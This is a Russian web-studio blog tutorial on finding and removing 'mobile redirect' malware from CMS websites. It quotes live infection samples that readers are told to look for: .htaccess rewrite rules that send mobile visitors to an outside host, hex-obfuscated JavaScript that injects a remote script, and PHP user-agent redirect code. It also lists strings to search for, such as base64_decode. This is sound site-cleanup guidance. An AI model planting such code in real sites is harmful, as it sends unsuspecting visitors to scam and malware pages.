Авторизация на сайте

Последнее из портфолио

Как с нами связаться

  • 8 953 242 0439
  • +7 953 242 0439
  • ws-aprel@ya.ru
  • *******
  • Россия, г. Горячий Ключ
» » » Вирусы на сайте. Мобильный редирект

Вирусы на сайте. Мобильный редирект

galina2601 18-11-2013, 23:11 12 450 Уроки по CMS / Уроки по DLE

В последнее время все чаще Яндекс пугает владельцев сайтов зловещим вердиктом "Мобильный редирект". И сайт начинает выводится в поиске с позорной надписью «Этот сайт может угрожать безопасности вашего компьютера».

Сам Яндекс дает такое определение этому виду заражения:

Мобильный редирект – это перенаправление пользователя на сторонний сайт при попытке просмотра страниц исходного сайта с помощью мобильного устройства (например, телефона).

Если говорить простым языком, то при заходе на сайт со стационарного компьютера, никаких опасностей не предвидится. Но если вы зайдете на этот же сайт с телефона, планшета, или любого другого мобильного устройства, вас перебросит на другой сайт, содержащий всевозможные пакости для вас. Хорошо если это будет просто сайт с рекламой или чем-то подобным. Но может быть и так, что ничего не подозревающему посетителю вежливо предложат обновить "устаревший" браузер, или закачать обновление для антивируса, или отправить смс, якобы подтверждающую, что вы не робот, и так далее, масса вариантов. А в итоге можно лишится денег на телефоне, и связанном с ним счете в банке, стать, не подозревая того, рассыльщиком спама, короче говоря, получить серьезную головную боль.

Особенно подвержены этому виду заражения сайты на нелицензионных версиях cms DLE и на бесплатных cms Joomla и WordPress. 

Что делать и как найти вредоносный код, если уж с вами такая оказия приключилась.

Действие первое.

Поменять на всякий случай все пароли - на хостинг, на доступ по ftp, на вход в админпанель. Конечно, с большой долей вероятности можно предположить, что вредоносный код  был получен, так сказать, в качестве бонуса, вместе с "бесплатным" шаблоном или "бесплатной" версией cms. Однако пароли поменять никогда не помешает.

Действие второе.  

Проверить все файлы .htaccsess на наличие редиректов такого вида:

RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "acs|alav|alca|amoi|audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc|cmd-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lg-c|lg-d|lg-g|lge-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|nec-|newt|noki|opwv" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "teli|tim-|tosh|tsm-|upg1|upsi|vk-v|voda|w3cs|wap-|wapa|wapi" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "wapp|wapr|webc|winw|winw|xda|xda-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "up.browser|up.link|windowssce|iemobile|mini|mmp" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "symbian|midp|wap|phone|pocket|mobile|pda|psp|PPC|Android" [NC]
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
RewriteCond %{HTTP_USER_AGENT} !america [NC]
RewriteCond %{HTTP_USER_AGENT} !avant [NC]
RewriteCond %{HTTP_USER_AGENT} !iphone [NC]
RewriteCond %{HTTP_USER_AGENT} !download [NC]
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]
RewriteRule ^(.*)$ http://www.vmaline.net/tds/go.php?sid=17 [L,R=302] 

Особенно обратить внимание на строчки вида:

RewriteRule ^(.*)$ http://www.vmaline.net/tds/go.php?sid=17 [L,R=302]

Естественно, адрес сайта может быть любой.

Если такие строчки есть, срочно удалить и установить для файлов .htaccsess права на доступ 444.

Действие третье.

Если файлы .htaccsess не содержат редиректы, следующим шагом будет проверка всех ява-скриптов. Практически любой шаблон сайта содержит ява-скрипты. Это могут быть разнообразные слайд-шоу, выпадающие меню, интерактивные элементы и так далее. Где их искать?
Во-первых, они могут быть в файле main.tpl (для cms DLE). Во-вторых, в любом из остальных tpl-файлов, в-третьих, в файлах ява-скриптов с расширением .js, в-четвертых, во всех php-файлах скрипта. Что ищем? Код вида:

var _0xb69a=["\x3C\x73\x63\x72\x69\x70\x74\x20\
x74\x79\x70\x65\ x3D\x27\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\
x73\x63\x72\x69\x70\x74\x27\x20\x73\x72\x63\x3D\x27\x68\x74\
x74\x70\x3A\x2F\x2F\x69\x6B\x6E\x6F\x70\x6F\x2E\x72\x75\
x2F\x69\x6B\x6E\x6F\x70\x6F\x5F\x62\x2E\x6A\x73\
x27\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E","\x77\x72\x69\x74\
x65"];document[_0xb69a[1]](_0xb69a[0]);

Или фрагменты кода типа:

include_once
base64_decode

Или вот такой код в php-файлах:

$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");
$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");

if ($iphone || $android || $palmpre || $ipod || $berry === true) {
header('Location: http://statuses.ws/');
}

Понятно, что просматривать все файлы долго и сложно. Можно и нужно упростить себе задачу - скачать последнюю лицензионную версию вашей cms и установить ее взамен стоящей. После этого огромная часть работы отпадет сама собой. Так как вы четко будете знать, что в скриптах движка вируса нет. А просмотреть файлы шаблона уже гораздо проще - их не так уж и много.


А еще лучше - скачать неплохую бесплатную программу с многоговорящим названием ai-bolit. Взять ее можно на сайте //www.revisium.com/ai/. Там же можно почитать, как с ней работать. Программа действительно хороша, так как ее на вооружение берут серьезные хостинг-компании. Ай-болит не лечит, а выполняет следующие действия:

ищет вирусы, вредоносные и хакерские скрипты;

определяет дорвеи;

ищет редиректы в .htaccess на вредоносные сайты

составляет список открытых для записи папок...

И еще много всяких полезных мелочей.


Похожие новости

  • Миралинкс - вечные ссылки
  • Как для каждой категории сделать свой шаблон?
  • Как проверить сайт на наличие вирусов?
  • Установка WordPress на хостинг
  • Что такое Internet? Зачем нужен язык разметки?

  • Добавить комментарий

    • bowtiesmilelaughingblushsmileyrelaxedsmirk
      heart_eyeskissing_heartkissing_closed_eyesflushedrelievedsatisfiedgrin
      winkstuck_out_tongue_winking_eyestuck_out_tongue_closed_eyesgrinningkissingstuck_out_tonguesleeping
      worriedfrowninganguishedopen_mouthgrimacingconfusedhushed
      expressionlessunamusedsweat_smilesweatdisappointed_relievedwearypensive
      disappointedconfoundedfearfulcold_sweatperseverecrysob
      joyastonishedscreamtired_faceangryragetriumph
      sleepyyummasksunglassesdizzy_faceimpsmiling_imp
      neutral_faceno_mouthinnocent
    Кликните на изображение чтобы обновить код, если он неразборчив